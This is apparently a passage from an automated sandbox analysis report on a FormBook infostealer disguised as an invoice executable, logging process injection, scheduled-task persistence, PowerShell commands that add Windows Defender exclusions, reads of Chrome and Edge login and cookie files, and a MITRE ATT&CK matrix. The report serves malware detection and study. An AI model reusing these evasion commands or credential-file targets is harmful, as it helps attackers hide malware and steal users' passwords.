            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Windows\SysWOW64\svchost.exeThread register set: target process: 3048Jump to behavior
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exe"Jump to behavior
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exe"Jump to behavior
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dpqsbGoWdXlp" /XML "C:\Users\user\AppData\Local\Temp\tmp68D8.tmp"Jump to behavior
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeProcess created: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exe "C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exe"Jump to behavior
            Source: C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dpqsbGoWdXlp" /XML "C:\Users\user\AppData\Local\Temp\tmp9353.tmp"Jump to behavior
            Source: C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exeProcess created: C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exe "C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exe"Jump to behavior
            Source: C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Windows\SysWOW64\svchost.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: IEFVDUdSaLLhw.exe, 0000000D.00000002.4577482168.00000000010B1000.00000002.00000001.00040000.00000000.sdmp, IEFVDUdSaLLhw.exe, 0000000D.00000000.2216481367.00000000010B0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: IProgram Manager
            Source: IEFVDUdSaLLhw.exe, 0000000D.00000002.4577482168.00000000010B1000.00000002.00000001.00040000.00000000.sdmp, IEFVDUdSaLLhw.exe, 0000000D.00000000.2216481367.00000000010B0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: IEFVDUdSaLLhw.exe, 0000000D.00000002.4577482168.00000000010B1000.00000002.00000001.00040000.00000000.sdmp, IEFVDUdSaLLhw.exe, 0000000D.00000000.2216481367.00000000010B0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: IEFVDUdSaLLhw.exe, 0000000D.00000002.4577482168.00000000010B1000.00000002.00000001.00040000.00000000.sdmp, IEFVDUdSaLLhw.exe, 0000000D.00000000.2216481367.00000000010B0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeQueries volume information: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exeQueries volume information: C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exe VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 11.2.z1SupplyInvoiceCM60916_Doc.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.2.z1SupplyInvoiceCM60916_Doc.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000B.00000002.2299844236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.4574137574.00000000007B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.4577917548.0000000003080000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.2351474935.0000000005710000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.4578048891.00000000030D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.2302119508.00000000024B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.4578178574.00000000031A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

            Remote Access Functionality

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 11.2.z1SupplyInvoiceCM60916_Doc.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.2.z1SupplyInvoiceCM60916_Doc.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000B.00000002.2299844236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.4574137574.00000000007B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.4577917548.0000000003080000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.2351474935.0000000005710000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.4578048891.00000000030D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.2302119508.00000000024B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.4578178574.00000000031A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
            Command and Scripting Interpreter            		1
            Scheduled Task/Job            		212
            Process Injection            		1
            Masquerading            		1
            OS Credential Dumping            		221
            Security Software Discovery            		Remote Services1
            Email Collection            		1
            Encrypted Channel            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts1
            Scheduled Task/Job            		1
            DLL Side-Loading            		1
            Scheduled Task/Job            		11
            Disable or Modify Tools            		LSASS Memory2
            Process Discovery            		Remote Desktop Protocol1
            Archive Collected Data            		3
            Ingress Tool Transfer            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            Abuse Elevation Control Mechanism            		51
            Virtualization/Sandbox Evasion            		Security Account Manager51
            Virtualization/Sandbox Evasion            		SMB/Windows Admin Shares1
            Data from Local System            		4
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
            DLL Side-Loading            		212
            Process Injection            		NTDS1
            Application Window Discovery            		Distributed Component Object ModelInput Capture4
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Deobfuscate/Decode Files or Information            		LSA Secrets2
            File and Directory Discovery            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Abuse Elevation Control Mechanism            		Cached Domain Credentials113
            System Information Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items4
            Obfuscated Files or Information            		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job12
            Software Packing            		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
            DLL Side-Loading            		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
